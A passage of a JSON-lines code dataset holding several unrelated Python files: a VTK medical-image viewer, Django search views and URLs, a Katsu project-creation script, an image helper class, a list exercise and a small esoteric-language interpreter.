vtk.vtkSliderRepresentation2D()\n sliderRep_min.SetMinimumValue(self.minGrayValue)\n sliderRep_min.SetMaximumValue(self.maxGrayValue)\n sliderRep_min.SetValue(self.minGrayValue + 1)\n sliderRep_min.SetTitleText(\"minValue\")\n sliderRep_min.SetSliderLength(0.025)\n sliderRep_min.SetSliderWidth(0.05)\n sliderRep_min.SetEndCapLength(0.005)\n sliderRep_min.SetEndCapWidth(0.025)\n sliderRep_min.SetTubeWidth(0.0125)\n sliderRep_min.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()\n sliderRep_min.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()\n sliderRep_min.GetPoint1Coordinate().SetValue(1 - 0.05 * count, 0.05)\n sliderRep_min.GetPoint2Coordinate().SetValue(1 - 0.05 * count, 0.45)\n\n sliderWidget_min = vtk.vtkSliderWidget()\n sliderWidget_min.SetInteractor(self.renWinInteractor)\n sliderWidget_min.SetRepresentation(sliderRep_min)\n sliderWidget_min.SetCurrentRenderer(self.render)\n sliderWidget_min.SetAnimationModeToAnimate()\n\n sliderRep_max = vtk.vtkSliderRepresentation2D()\n sliderRep_max.SetMinimumValue(self.minGrayValue)\n sliderRep_max.SetMaximumValue(self.maxGrayValue)\n sliderRep_max.SetValue(self.maxGrayValue - 1)\n sliderRep_max.SetTitleText(\"maxValue\")\n sliderRep_max.SetSliderLength(0.025)\n sliderRep_max.SetSliderWidth(0.05)\n sliderRep_max.SetEndCapLength(0.005)\n sliderRep_max.SetEndCapWidth(0.025)\n sliderRep_max.SetTubeWidth(0.0125)\n sliderRep_max.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()\n sliderRep_max.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()\n sliderRep_max.GetPoint1Coordinate().SetValue(1 - 0.05 * count, 0.55)\n sliderRep_max.GetPoint2Coordinate().SetValue(1 - 0.05 * count, 0.95)\n\n sliderWidget_max = vtk.vtkSliderWidget()\n sliderWidget_max.SetInteractor(self.renWinInteractor)\n sliderWidget_max.SetRepresentation(sliderRep_max)\n sliderWidget_max.SetCurrentRenderer(self.render)\n sliderWidget_max.SetAnimationModeToAnimate()\n\n def update_minmax(obj, ev):\n minValue = sliderWidget_min.GetRepresentation().GetValue()\n maxValue = sliderWidget_max.GetRepresentation().GetValue()\n # # reset value\n if minValue >= maxValue:\n if obj == sliderWidget_max:\n sliderWidget_max.GetRepresentation().SetValue(max(maxValue, 
minValue + 0.01))\n elif obj == sliderWidget_min:\n sliderWidget_min.GetRepresentation().SetValue(min(maxValue - 0.01, minValue))\n minValue = sliderWidget_min.GetRepresentation().GetValue()\n maxValue = sliderWidget_max.GetRepresentation().GetValue()\n\n self.updateGrayScale(minValue, maxValue)\n\n sliderWidget_min.AddObserver(vtk.vtkCommand.InteractionEvent, update_minmax)\n sliderWidget_max.AddObserver(vtk.vtkCommand.InteractionEvent, update_minmax)\n\n sliderWidget_min.EnabledOn()\n sliderWidget_max.EnabledOn()\n\n def addSliceToRender(self):\n # print(\"addSliceToRender\")\n self.info.append(\"addSliceToRender\")\n sliceActor_i_min = vtk.vtkImageSlice()\n sliceMapper_i_min = vtk.vtkImageSliceMapper()\n sliceMapper_i_min.SetInputData(self.extractVOI_src.GetOutput())\n sliceMapper_i_min.SetOrientationToX()\n sliceMapper_i_min.SetSliceNumber(0)\n sliceActor_i_min.SetMapper(sliceMapper_i_min)\n\n sliceActor_j_min = vtk.vtkImageSlice()\n sliceMapper_j_min = vtk.vtkImageSliceMapper()\n sliceMapper_j_min.SetInputData(self.extractVOI_src.GetOutput())\n sliceMapper_j_min.SetOrientationToY()\n sliceMapper_j_min.SetSliceNumber(0)\n sliceActor_j_min.SetMapper(sliceMapper_j_min)\n\n sliceActor_k_min = vtk.vtkImageSlice()\n sliceMapper_k_min = vtk.vtkImageSliceMapper()\n sliceMapper_k_min.SetInputData(self.extractVOI_src.GetOutput())\n sliceMapper_k_min.SetOrientationToZ()\n sliceMapper_k_min.SetSliceNumber(0)\n sliceActor_k_min.SetMapper(sliceMapper_k_min)\n\n sliceActor_i_max = vtk.vtkImageSlice()\n sliceMapper_i_max = vtk.vtkImageSliceMapper()\n sliceMapper_i_max.SetInputData(self.extractVOI_src.GetOutput())\n sliceMapper_i_max.SetOrientationToX()\n sliceMapper_i_max.SetSliceNumber(self.dims[0])\n sliceActor_i_max.SetMapper(sliceMapper_i_max)\n\n sliceActor_j_max = vtk.vtkImageSlice()\n sliceMapper_j_max = vtk.vtkImageSliceMapper()\n sliceMapper_j_max.SetInputData(self.extractVOI_src.GetOutput())\n sliceMapper_j_max.SetOrientationToY()\n sliceMapper_j_max.SetSliceNumber(self.dims[1])\n sliceActor_j_max.SetMapper(sliceMapper_j_max)\n\n sliceActor_k_max = vtk.vtkImageSlice()\n sliceMapper_k_max = vtk.vtkImageSliceMapper()\n sliceMapper_k_max.SetInputData(self.extractVOI_src.GetOutput())\n sliceMapper_k_max.SetOrientationToZ()\n sliceMapper_k_max.SetSliceNumber(self.dims[2])\n sliceActor_k_max.SetMapper(sliceMapper_k_max)\n\n sliceActor_i_min.GetProperty().SetColorLevel(self.maxGrayValue / 2 + self.minGrayValue / 2)\n sliceActor_i_min.GetProperty().SetColorWindow(self.maxGrayValue - self.minGrayValue)\n sliceActor_j_min.GetProperty().SetColorLevel(self.maxGrayValue / 2 + self.minGrayValue / 2)\n sliceActor_j_min.GetProperty().SetColorWindow(self.maxGrayValue - self.minGrayValue)\n sliceActor_k_min.GetProperty().SetColorLevel(self.maxGrayValue / 2 + self.minGrayValue / 2)\n sliceActor_k_min.GetProperty().SetColorWindow(self.maxGrayValue - self.minGrayValue)\n\n sliceActor_i_max.GetProperty().SetColorLevel(self.maxGrayValue / 2 + self.minGrayValue / 2)\n sliceActor_i_max.GetProperty().SetColorWindow(self.maxGrayValue - self.minGrayValue)\n sliceActor_j_max.GetProperty().SetColorLevel(self.maxGrayValue / 2 + self.minGrayValue / 2)\n sliceActor_j_max.GetProperty().SetColorWindow(self.maxGrayValue - self.minGrayValue)\n sliceActor_k_max.GetProperty().SetColorLevel(self.maxGrayValue / 2 + self.minGrayValue / 2)\n sliceActor_k_max.GetProperty().SetColorWindow(self.maxGrayValue - self.minGrayValue)\n\n self.render.AddActor(sliceActor_i_min)\n self.render.AddActor(sliceActor_j_min)\n 
self.render.AddActor(sliceActor_k_min)\n self.render.AddActor(sliceActor_i_max)\n self.render.AddActor(sliceActor_j_max)\n self.render.AddActor(sliceActor_k_max)\n\n self.slicesActors = [sliceActor_i_min, sliceActor_j_min, sliceActor_k_min,\n sliceActor_i_max, sliceActor_j_max, sliceActor_k_max]\n self.slicesMappers = [sliceMapper_i_min, sliceMapper_j_min, sliceMapper_k_min,\n sliceMapper_i_max, sliceMapper_j_max, sliceMapper_k_max]\n\n def addCropSliderToRender(self):\n # print(\"addCropSliderToRender\")\n self.info.append(\"addCropSliderToRender\")\n\n def getCropSlider(dim_index, dim_size, render, renWinInteractor):\n sliderRep_min = vtk.vtkSliderRepresentation2D()\n sliderRep_min.SetMinimumValue(0)\n sliderRep_min.SetMaximumValue(dim_size - 1)\n sliderRep_min.SetValue(0)\n sliderRep_min.SetSliderLength(0.025)\n sliderRep_min.SetSliderWidth(0.025)\n sliderRep_min.SetEndCapLength(0.005)\n sliderRep_min.SetEndCapWidth(0.025)\n sliderRep_min.SetTubeWidth(0.0125)\n sliderRep_min.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()\n sliderRep_min.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()\n sliderRep_min.GetPoint1Coordinate().SetValue(0.05 * dim_index, 0.05)\n sliderRep_min.GetPoint2Coordinate().SetValue(0.05 * dim_index, 0.45)\n\n sliderWidget_min = vtk.vtkSliderWidget()\n sliderWidget_min.SetInteractor(renWinInteractor)\n sliderWidget_min.SetRepresentation(sliderRep_min)\n sliderWidget_min.SetCurrentRenderer(render)\n sliderWidget_min.SetAnimationModeToAnimate()\n\n sliderRep_max = vtk.vtkSliderRepresentation2D()\n sliderRep_max.SetMinimumValue(0)\n sliderRep_max.SetMaximumValue(dim_size - 1)\n sliderRep_max.SetValue(dim_size - 1)\n sliderRep_max.SetSliderLength(0.025)\n sliderRep_max.SetSliderWidth(0.025)\n sliderRep_max.SetEndCapLength(0.005)\n sliderRep_max.SetEndCapWidth(0.025)\n sliderRep_max.SetTubeWidth(0.0125)\n sliderRep_max.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()\n sliderRep_max.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()\n sliderRep_max.GetPoint1Coordinate().SetValue(0.05 * dim_index, 0.55)\n sliderRep_max.GetPoint2Coordinate().SetValue(0.05 * dim_index, 0.95)\n\n sliderWidget_max = vtk.vtkSliderWidget()\n sliderWidget_max.SetInteractor(renWinInteractor)\n sliderWidget_max.SetRepresentation(sliderRep_max)\n sliderWidget_max.SetCurrentRenderer(render)\n sliderWidget_max.SetAnimationModeToAnimate()\n\n return sliderWidget_min, sliderWidget_max\n\n def update_crop(obj, ev):\n # print(obj)\n dim1_minValue = dim1_sliderWidget_min.GetRepresentation().GetValue()\n dim1_maxValue = dim1_sliderWidget_max.GetRepresentation().GetValue()\n dim2_minValue = dim2_sliderWidget_min.GetRepresentation().GetValue()\n dim2_maxValue = dim2_sliderWidget_max.GetRepresentation().GetValue()\n dim3_minValue = dim3_sliderWidget_min.GetRepresentation().GetValue()\n dim3_maxValue = dim3_sliderWidget_max.GetRepresentation().GetValue()\n # # reset value\n if dim1_minValue >= dim1_maxValue:\n if obj == dim1_sliderWidget_max:\n dim1_sliderWidget_max.GetRepresentation().SetValue(max(dim1_maxValue, dim1_minValue + 1))\n elif obj == dim1_sliderWidget_min:\n dim1_sliderWidget_min.GetRepresentation().SetValue(min(dim1_maxValue - 1, dim1_minValue))\n if dim2_minValue >= dim2_maxValue:\n if obj == dim2_sliderWidget_max:\n dim2_sliderWidget_max.GetRepresentation().SetValue(max(dim2_maxValue, dim2_minValue + 1))\n elif obj == dim2_sliderWidget_min:\n dim2_sliderWidget_min.GetRepresentation().SetValue(min(dim2_maxValue - 1, dim2_minValue))\n if 
dim3_minValue >= dim3_maxValue:\n                if obj == dim3_sliderWidget_max:\n                    dim3_sliderWidget_max.GetRepresentation().SetValue(max(dim3_maxValue, dim3_minValue + 1))\n                elif obj == dim3_sliderWidget_min:\n                    dim3_sliderWidget_min.GetRepresentation().SetValue(min(dim3_maxValue - 1, dim3_minValue))\n\n            dim1_minValue = dim1_sliderWidget_min.GetRepresentation().GetValue()\n            dim1_maxValue = dim1_sliderWidget_max.GetRepresentation().GetValue()\n            dim2_minValue = dim2_sliderWidget_min.GetRepresentation().GetValue()\n            dim2_maxValue = dim2_sliderWidget_max.GetRepresentation().GetValue()\n            dim3_minValue = dim3_sliderWidget_min.GetRepresentation().GetValue()\n            dim3_maxValue = dim3_sliderWidget_max.GetRepresentation().GetValue()\n\n            # print(dim1_minValue, dim1_maxValue)\n            # print(self.dims)\n            #\n            # print(self.extractVOI_src.GetOutput().GetDimensions())\n            # print('update_crop')\n\n            self.updateSlice([dim1_minValue, dim2_minValue, dim3_minValue,\n                              dim1_maxValue, dim2_maxValue, dim3_maxValue])\n\n        dim1_sliderWidget_min, dim1_sliderWidget_max = getCropSlider(1, self.dims[0], self.render,\n                                                                     self.renWinInteractor)\n        dim2_sliderWidget_min, dim2_sliderWidget_max = getCropSlider(2, self.dims[1], self.render,\n                                                                     self.renWinInteractor)\n        dim3_sliderWidget_min, dim3_sliderWidget_max = getCropSlider(3, self.dims[2], self.render,\n                                                                     self.renWinInteractor)\n\n        dim1_sliderWidget_min.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)\n        dim1_sliderWidget_max.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)\n        dim2_sliderWidget_min.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)\n        dim2_sliderWidget_max.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)\n        dim3_sliderWidget_min.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)\n        dim3_sliderWidget_max.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)\n\n        dim1_sliderWidget_min.EnabledOn()\n        dim1_sliderWidget_max.EnabledOn()\n        dim2_sliderWidget_min.EnabledOn()\n        dim2_sliderWidget_max.EnabledOn()\n        dim3_sliderWidget_min.EnabledOn()\n        dim3_sliderWidget_max.EnabledOn()\n\n    def addSeg(self, numpyImage_seg, spacing=(1.0, 1.0, 1.0)):\n        self.info.append(\"addSeg\")\n        # print(\"add seg\")\n\n        # numpyImage_seg = numpyImage_seg.astype(np.int)\n        # for i, u in enumerate(np.unique(numpyImage_seg)):\n        #     numpyImage_seg[numpyImage_seg == u] = i\n        # print(np.unique(numpyImage_seg))\n\n        # np.float was removed in NumPy >= 1.20; use an explicit dtype instead\n        self.seg_arr.SetArray(numpyImage_seg.astype(np.float32))\n        self.seg_arr.SetDataSpacing(tuple(reversed(spacing)))\n        self.seg_arr.SetDataOrigin((0, 0, 0))\n        self.seg_arr.Update()\n\n        tcfun_seg = vtk.vtkPiecewiseFunction()\n        tcfun_seg.AddPoint(self.minGrayValue, 0.0)\n        tcfun_seg.AddPoint(self.minGrayValue + 0.25, 0.0)\n        tcfun_seg.AddPoint(self.maxGrayValue, self.segOpacity)\n\n        gradtfun_seg = vtk.vtkPiecewiseFunction()\n        gradtfun_seg.AddPoint(0.05, 0.8)\n        gradtfun_seg.AddPoint(0.1, 0.9)\n        gradtfun_seg.AddPoint(0.6, 1.0)\n        # gradtfun_seg.AddPoint(1.0, 0.9)\n        # gradtfun_seg.AddPoint(self.maxGrayValue, 1.1)\n\n        ctfun_seg = vtk.vtkColorTransferFunction()\n        ctfun_seg.AddRGBPoint(self.minGrayValue, 0.3, 0.6, 0.3)\n        ctfun_seg.AddRGBPoint(self.maxGrayValue, 0.3, 0.6, 0.3)\n\n        # outline = vtk.vtkOutlineFilter()\n        # outline.SetInputConnection(self.seg_arr.GetOutputPort())\n        # outlineMapper = vtk.vtkPolyDataMapper()\n        # outlineMapper.SetInputConnection(outline.GetOutputPort())\n        # outlineActor = vtk.vtkActor()\n        # outlineActor.SetMapper(outlineMapper)\n\n        self.extractVOI_seg.SetInputConnection(self.seg_arr.GetOutputPort())\n        self.extractVOI_seg.SetVOI(0, self.dims[0] - 1, 0, self.dims[1] - 1, 
0, self.dims[2] - 1)\n self.extractVOI_seg.Update()\n\n volumeMapper_seg = vtk.vtkGPUVolumeRayCastMapper()\n volumeMapper_seg.SetInputData(self.extractVOI_seg.GetOutput())\n\n self.volumeProperty_seg.SetColor(ctfun_seg)\n self.volumeProperty_seg.SetScalarOpacity(tcfun_seg)\n self.volumeProperty_seg.SetGradientOpacity(gradtfun_seg)\n self.volumeProperty_seg.SetInterpolationTypeToLinear()\n self.volumeProperty_seg.ShadeOn()\n\n render_volume_seg = vtk.vtkVolume()\n render_volume_seg.SetMapper(volumeMapper_seg)\n render_volume_seg.SetProperty(self.volumeProperty_seg)\n\n sliderRep_segOpacity = vtk.vtkSliderRepresentation2D()\n sliderRep_segOpacity.SetMinimumValue(0)\n sliderRep_segOpacity.SetMaximumValue(1)\n sliderRep_segOpacity.SetValue(self.segOpacity)\n # sliderRep_segOpacity.SetTitleText(\"seg opacity\")\n sliderRep_segOpacity.SetSliderLength(0.025)\n sliderRep_segOpacity.SetSliderWidth(0.05)\n sliderRep_segOpacity.SetEndCapLength(0.005)\n sliderRep_segOpacity.SetEndCapWidth(0.025)\n sliderRep_segOpacity.SetTubeWidth(0.0125)\n sliderRep_segOpacity.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()\n sliderRep_segOpacity.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()\n sliderRep_segOpacity.GetPoint1Coordinate().SetValue(0.15, 0.05)\n sliderRep_segOpacity.GetPoint2Coordinate().SetValue(0.85, 0.05)\n\n sliderWidget_segOpacity = vtk.vtkSliderWidget()\n sliderWidget_segOpacity.SetInteractor(self.renWinInteractor)\n sliderWidget_segOpacity.SetRepresentation(sliderRep_segOpacity)\n sliderWidget_segOpacity.SetCurrentRenderer(self.render)\n sliderWidget_segOpacity.SetAnimationModeToAnimate()\n\n def update_segopacity(obj, ev):\n self.segOpacity = sliderWidget_segOpacity.GetRepresentation().GetValue()\n\n self.volumeProperty_seg.GetScalarOpacity().AddPoint(self.maxGrayValue, self.segOpacity)\n\n sliderWidget_segOpacity.AddObserver(vtk.vtkCommand.InteractionEvent, update_segopacity)\n sliderWidget_segOpacity.EnabledOn()\n\n # self.render.AddActor(outlineActor)\n self.render.AddVolume(render_volume_seg)\n\n def updateGrayScale(self, minValue, maxValue):\n # print('update_minmax')\n self.currentMin, self.currentMax = minValue, maxValue\n for i in self.info:\n # print(i)\n if i == \"addGrayScaleSliderToRender\" and self.showImage:\n self.volumeProperty_src.GetScalarOpacity().RemoveAllPoints()\n self.volumeProperty_src.GetScalarOpacity().AddPoint(minValue, 0.0)\n self.volumeProperty_src.GetScalarOpacity().AddPoint(maxValue, 1.0)\n if i == \"addSliceToRender\":\n for sliceActor in self.slicesActors:\n sliceActor.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)\n sliceActor.GetProperty().SetColorWindow(maxValue - minValue)\n\n def updateSlice(self, crop):\n if self.slicesMappers:\n assert len(self.slicesMappers) == len(crop)\n for i, s in enumerate(crop):\n self.slicesMappers[i].SetSliceNumber(int(s))\n\n if \"addSrc\" in self.info:\n self.extractVOI_src.SetVOI(int(crop[0]), int(crop[3]),\n int(crop[1]), int(crop[4]),\n int(crop[2]), int(crop[5]))\n self.extractVOI_src.Update()\n\n if \"addSeg\" in self.info:\n self.extractVOI_seg.SetVOI(int(crop[0]), int(crop[3]),\n int(crop[1]), int(crop[4]),\n int(crop[2]), int(crop[5]))\n self.extractVOI_seg.Update()\n\n def keypressFun(self, obj, event):\n # print(self.info)\n key = self.renWinInteractor.GetKeySym().upper()\n # 键盘控制交互式操作\n # print(key)\n if key == 'L' and \"addSeg\" in self.info:\n if self.showLabel:\n # print('Hide Label')\n self.volumeProperty_seg.GetScalarOpacity().RemoveAllPoints()\n 
self.volumeProperty_seg.GetScalarOpacity().AddPoint(self.minGrayValue, 0.0)\n self.volumeProperty_seg.GetScalarOpacity().AddPoint(self.maxGrayValue, 0.0)\n else:\n # print('Show Label')\n self.volumeProperty_seg.GetScalarOpacity().RemoveAllPoints()\n self.volumeProperty_seg.GetScalarOpacity().AddPoint(self.minGrayValue, 0.0)\n self.volumeProperty_seg.GetScalarOpacity().AddPoint(self.minGrayValue + 0.5, 0.0)\n self.volumeProperty_seg.GetScalarOpacity().AddPoint(self.maxGrayValue, self.segOpacity)\n self.showLabel = not self.showLabel\n\n if key == 'S' and \"addSliceToRender\" in self.info:\n # print('Slice')\n for sliceActor in self.slicesActors:\n sliceActor.GetProperty().SetOpacity(1 - sliceActor.GetProperty().GetOpacity())\n\n if key == \"T\" and \"addSrc\" in self.info:\n if self.showImage:\n # print('Hide Image')\n self.volumeProperty_src.GetScalarOpacity().RemoveAllPoints()\n self.volumeProperty_src.GetScalarOpacity().AddPoint(self.minGrayValue, 0.0)\n self.volumeProperty_src.GetScalarOpacity().AddPoint(self.maxGrayValue, 0.0)\n else:\n # print('Show Image')\n self.volumeProperty_src.GetScalarOpacity().RemoveAllPoints()\n self.volumeProperty_src.GetScalarOpacity().AddPoint(self.currentMin, 0.0)\n self.volumeProperty_src.GetScalarOpacity().AddPoint(self.currentMax, 1.0)\n self.showImage = not self.showImage\n\n self.renWin.Render()\n return\n\n\ndef vtkWindowView(numpyImage, numpySeg=None, spacing=(1.0, 1.0, 1.0)):\n m = MedicalImageWindow()\n m.viewer.addSrc(numpyImage, spacing=spacing)\n if numpySeg is not None:\n m.viewer.addSeg(numpySeg, spacing)\n m.viewer.addGrayScaleSliderToRender()\n m.viewer.addSliceToRender()\n m.viewer.addCropSliderToRender()\n m.startWindow()\n\n\ndef vtkWindowViewNotebook(numpyImage, spacing=(1.0, 1.0, 1.0)):\n print('Running vtkWindowViewNotebook ...')\n import sys\n if os.path.exists(os.path.dirname(__file__) + '/tmp.pkl'):\n os.remove(os.path.dirname(__file__) + '/tmp.pkl')\n pickle.dump({'data': numpyImage, 'spacing': spacing}, open(os.path.dirname(__file__) + '/tmp.pkl', 'wb'))\n # print(os.path.dirname(__file__))\n os.system(f'{sys.executable} \\\"{os.path.dirname(__file__)}/tmp_func.py\\\" --mode 2')\n print('closing')\n","repo_name":"TimothyZero/MedVision","sub_path":"medvision/visulaize/vtkViewClass.py","file_name":"vtkViewClass.py","file_ext":"py","file_size_in_byte":27096,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"37"}
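A minimal way to exercise the viewer above, assuming a VTK build with GPU ray casting and an available display; the random volume and threshold "segmentation" are placeholders, not data from the original project:

import numpy as np
from vtkViewClass import vtkWindowView  # file name as given in the repo metadata

vol = np.random.rand(64, 128, 128).astype(np.float32)  # (z, y, x) volume
seg = (vol > 0.95).astype(np.float32)                  # crude placeholder mask
vtkWindowView(vol, numpySeg=seg, spacing=(2.0, 1.0, 1.0))
# Inside the window: 'L' toggles the label, 'T' the image, 'S' the slice planes.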
+{"seq_id":"70292508908","text":"from django.db.models import Count\nfrom django.db import IntegrityError\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom search.search_form import Searchbar\nfrom search.models.product import Product\nfrom search.models.category import Categories\nfrom search.models.substitute import Substitute\nfrom users.models import User\n\n\ndef home(request):\n search_bar = Searchbar()\n context = {\n \"searchbar\": search_bar\n }\n return render(request, 'search/home.html', context)\n\n\ndef products(request):\n if request.method == \"POST\":\n product_search = request.POST[\"product_search\"]\n products_obj = Product.objects.all().filter(\n name__contains=product_search.strip().lower().capitalize()\n )[:6]\n print(products_obj)\n context = {\n # title in HTML will contain value of product_search\n \"title\": product_search,\n \"products\": products_obj,\n }\n print(context)\n # send context to products.html template and render this template\n return render(request, \"search/products.html\", context)\n\n\ndef product(request, product_id):\n \"\"\"Displays the product details page\n Args:\n request: base parameter\n product_id (int): Id of the product\n \"\"\"\n # try:\n product_obj = Product.objects.get(pk=product_id)\n context = {\"product\": product_obj}\n # except Product.DoesNotExist:\n print(context)\n return render(request, \"search/product.html\", context)\n\n\ndef substitutes(request, product_id):\n \"\"\" Display substitutes from selected product\"\"\"\n # Find product searched by user with id\n product_query = Product.objects.get(pk=product_id)\n\n # Find the category of the product\n product_query_cat = Categories.objects.filter(product__id=product_query.id)\n\n # Find 9 products with better nutrition_score in the same category\n substitutes_prod = (\n Product.objects.filter(category__in=product_query_cat)\n .annotate(nb_cat=Count(\"category\"))\n .filter(nb_cat__gte=3)\n .filter(nutrition_score__lt=product_query.nutrition_score)\n .order_by(\"nutrition_score\")[:9]\n )\n\n context = {\"product\": product_query, \"substitutes\": substitutes_prod}\n\n return render(request, \"search/substitutes.html\", context)\n\n\n@login_required\ndef save_favorite(request, product_id, substitute_id):\n \"\"\" save the product and the substitute chosen for the user \"\"\"\n product_query = Product.objects.get(pk=product_id)\n substitute_query = Product.objects.get(pk=substitute_id)\n user = User.objects.get(pk=request.user.id)\n favorite = Substitute(product_id_id=product_query.id, substitute_id_id=substitute_query.id, user_id_id=user.id)\n try:\n favorite.save()\n return redirect(\"search:favorites\")\n except IntegrityError:\n return redirect(\"search:home\")\n\n\n@login_required\ndef favorites(request):\n \"\"\"Display Favorites page of the user\"\"\"\n favorites_prod = Substitute.objects.filter(user_id_id=request.user.id)\n context = {\n \"favorites\": favorites_prod\n }\n return render(request, \"search/favorites.html\", context)\n\n\ndef legal_notice(request):\n return render(request, \"search/legal_notice.html\")\n","repo_name":"Blankxx420/P11_Healthyfoodchoice_V2","sub_path":"search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"21344287326","text":"import sys\nimport argparse\nimport requests\n\n\"\"\"\nAn ingest script that automates the initial data ingest for katsu service.\n\nNote that you should run this script with Katsu's virtualenv activated.\n\"\"\"\n\ndef create_project(katsu_server_url: str, project_title: str) -> str:\n \"\"\"\n Create a new Katsu project.\n\n Return the uuid of the newly-created project.\n \"\"\"\n\n project_request = {\n \"title\": project_title,\n \"description\": \"A new project.\"\n }\n\n try:\n r = requests.post(katsu_server_url + \"/api/projects\", json=project_request)\n except requests.exceptions.ConnectionError:\n print(\n \"Connection to the API server {} cannot be established.\".format(\n katsu_server_url\n )\n )\n sys.exit()\n\n if r.status_code == 201:\n project_uuid = r.json()[\"identifier\"]\n return project_uuid\n elif r.status_code == 400:\n print(\n \"Something else went wrong. It might be that your a table with the same name already exists or that your table name is too short.\"\n )\n sys.exit()\n else:\n print(r.json())\n sys.exit()\n\ndef main():\n \"\"\"\n Driver function for script.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"A script that facilitates initial data ingestion of Katsu service.\")\n\n parser.add_argument(\"project_name\", help=\"Project name.\")\n parser.add_argument(\"server_url\", help=\"The URL of Katsu Instance.\")\n\n args = parser.parse_args()\n project_name = str.strip(args.project_name)\n katsu_server_url = str.strip(args.server_url)\n\n project_uuid = create_project(katsu_server_url, project_name)\n print(project_uuid)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CanDIG/federated-learning","sub_path":"ingestion-scripts/internal/create_proj.py","file_name":"create_proj.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
+{"seq_id":"9387070612","text":"from django.urls import path\n\nfrom .views import (\n register_view,\n login_view,\n logout_view,\n profile_view,\n update_profile_view,\n follow_unfollow_user_view,\n)\n\napp_name = \"account\"\n\n\nurlpatterns = [\n path(\"register/\", register_view, name=\"register\"),\n path(\"login/\", login_view, name=\"login\"),\n path(\"logout/\", logout_view, name=\"logout\"),\n path(\"profile/\", profile_view, name=\"profile\"),\n path(\"profile/update/\", update_profile_view, name=\"update\"),\n path(\"user/fl_unfl/\", follow_unfollow_user_view, name=\"fl_unfl\")\n]","repo_name":"Dasifue/PyStagram","sub_path":"account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"35883920313","text":"import os\nfrom PIL import Image\nfrom datetime import datetime\n\n\nclass LibImage:\n\n @staticmethod\n def get_image_stat(image_path):\n with Image.open(image_path) as im:\n width, height = im.size\n dict_info = im._getexif()\n date_info = None\n if dict_info is not None and 36867 in dict_info:\n date_info = datetime.strptime(dict_info[36867], \"%Y:%m:%d %H:%M:%S\")\n\n return date_info, width, height\n\n @staticmethod\n def get_all_media_from_folder(from_file_location_dir):\n out_files = []\n for root_dir, dir_names, file_names in os.walk(from_file_location_dir):\n for file_name in file_names:\n ext = os.path.splitext(file_name)[1].lower()\n if ext in [\".jpg\", \".jpeg\", \".png\", # all images\n \".mp4\", \".avi\"]: # all vedio\n file_path = os.path.join(root_dir, file_name)\n out_files.append(file_path)\n return out_files\n\n @staticmethod\n def helper_is_file_image(file_path):\n ext = os.path.splitext(file_path)[1].lower()\n return ext in [\".jpg\", \".jpeg\", \".png\"]\n\n @staticmethod\n def helper_is_file_vid(file_path):\n ext = os.path.splitext(file_path)[1].lower()\n return ext in [\".mp4\", \".avi\"]\n\n\n\n\n\n\n","repo_name":"aryakal/libs","sub_path":"libImage.py","file_name":"libImage.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"13359633121","text":"#Create a function that returns the indices of all occurrences of an item in the list.\n\n#Examples\n#get_indices([\"a\", \"a\", \"b\", \"a\", \"b\", \"a\"], \"a\") ➞ [0, 1, 3, 5]\n\n\n\ndef get_indices(lst, el):\n\tout_list = []\n\tfor i, x in enumerate(lst):\n\t\tif x == el:\n\t\t\tout_list.append(i)\n\treturn out_list\t\t\n\n\nprint(get_indices([\"a\", \"a\", \"b\", \"a\", \"b\", \"a\"],\"a\"))","repo_name":"adambatchelor2/python","sub_path":"Edabit_02012020_IndiciesInList.py","file_name":"Edabit_02012020_IndiciesInList.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"72697515307","text":"import secrets\r\nimport time\r\nimport sys\r\n\r\n\r\ndef run(code):\r\n bit = ind = 0\r\n vel = new = 1\r\n\r\n while ind < len(code):\r\n sym = code[ind]\r\n if sym == '^':\r\n bit ^= 1\r\n elif sym == '!':\r\n print(bit, end='')\r\n new = 0\r\n elif sym == '?':\r\n val = input('\\nInput: '[new:])\r\n bit = (not val) + 0\r\n new = 1\r\n elif sym == '@':\r\n bit = secrets.randbelow(2)\r\n elif sym == '&' and bit:\r\n ind += vel\r\n elif sym == '#':\r\n return\r\n elif sym == '<':\r\n ind = -vel\r\n elif sym == '/':\r\n vel *= -1\r\n elif sym == '_':\r\n time.sleep(1)\r\n\r\n ind += vel\r\n\r\n\r\nif __name__ == '__main__':\r\n if len(sys.argv) > 1:\r\n with open(sys.argv[1]) as file:\r\n data = file.read()\r\n run(data)\r\n","repo_name":"bangyen/esolangs","sub_path":"register-based/lightlang.py","file_name":"lightlang.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"}
